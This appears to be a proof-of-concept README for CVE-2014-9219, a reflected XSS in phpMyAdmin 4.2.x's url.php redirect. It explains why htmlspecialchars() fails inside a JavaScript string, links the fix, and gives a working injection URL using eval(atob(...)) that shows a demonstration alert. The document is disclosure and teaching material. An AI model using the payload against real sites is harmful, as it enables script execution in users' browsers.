# CVE-2014-9219
CVE-2014-9219 XSS POC

# About
The vulnerability is caused by an input validation error in the redirection feature in url.php in phpMyAdmin 4.2.x before 4.2.13.1 when processing url parameter. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in victim's browser in security context of vulnerable website.

# Affected Version
phpMyAdmin: 4.2.0 - 4.2.13

# Problem


The vulnerable code uses `htmlspecialchars()` to sanitize the URL parameter before inserting it into a JavaScript string context:
```
window.location='" . htmlspecialchars($_GET['url']) . "';
```
`htmlspecialchars()` is designed for HTML context, not JavaScript string context. It does not adequately escape characters that can break out of JavaScript string literals.

[check out the commit](https://github.com/phpmyadmin/phpmyadmin/commit/9b2479b7216dd91a6cc2f231c0fd6b85d457f6e2#diff-dfef64e154e6b35b10712c6db4dfd19f38670441cdb05983b5bca66fd7704480L27)


# POC

url encoded:
```
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
```

url decoded:
```
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'
```

HTML Output:
```html
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.
```
